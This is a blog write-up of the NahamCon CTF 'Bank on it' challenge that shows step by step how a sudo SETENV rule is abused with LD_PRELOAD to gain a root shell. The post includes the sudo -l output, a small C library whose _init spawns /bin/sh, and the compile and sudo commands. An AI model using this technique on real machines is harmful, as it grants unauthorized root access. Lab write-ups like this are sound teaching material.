bank on it

pirateducky

pirateducky

Posted on March 15, 2021

bank on it

Screenshot_2021-03-14 NahamCon CTF
To log into the box use the ssh keys found here

I had a lot of fun doing the NahamConCTF, thanks everyone who was involved. This is a small writeup for the Bank on it challenge.

Summary:
The current user can execute the /opt/banking/bank binary using sudo, however the SETENV option is enabled, which helps persist environment variables when using sudo since it starts a session, with that we can use LD_PRELOAD to load a malicious function and get a shell as root.

Credit to: https://sumit-ghosh.com/articles/hijacking-library-functions-code-injection-ld-preload/

Find out if the user can run anything as root we can use sudo -l , it appears that they can run the /op/banking/bank binary as root, with no password, we also see the SETENV which will come in handy later.

$ sudo -l
Matching Defaults entries for gus on banking-on-it-88199b44846b0f72-65bbbf7d6c-82b95:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User gus may run the following commands on banking-on-it-88199b44846b0f72-65bbbf7d6c-82b95:
    (root) SETENV: NOPASSWD: /opt/banking/bank
Enter fullscreen mode Exit fullscreen mode

SETENV is dangerous, it allows us to persist environment variables when using sudo.

Since SETENV is specified in the sudoers file we can use this to load an environment variable that will allow us to hijack where shared libraries are used first - and although we could hijack one of the functions being used directly in the binary to make sure this works we'll be hijacking the _init function, more info here.

#include <unistd.h>

void _init() {
    char *argv[] = {"/bin/sh", 0};
    execve(argv[0], &argv[0], NULL);
}
Enter fullscreen mode Exit fullscreen mode

We'll name this shlib.c and now compile it like

gcc -shared -fpic -nostartfiles shlib.c -o [shlib.so](http://shlib.so)

You should now have a [shlib.so](http://shlib.so) file which we'll be using to hijack the _init function in the binary.

Now let's use LD_PRELOAD

Let's execute the binary like this:

sudo LD_PRELOAD=/home/gus/shlib.so /opt/banking/bank

root

And we are now root!

💖 💪 🙅 🚩
pirateducky
pirateducky

Posted on March 15, 2021

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related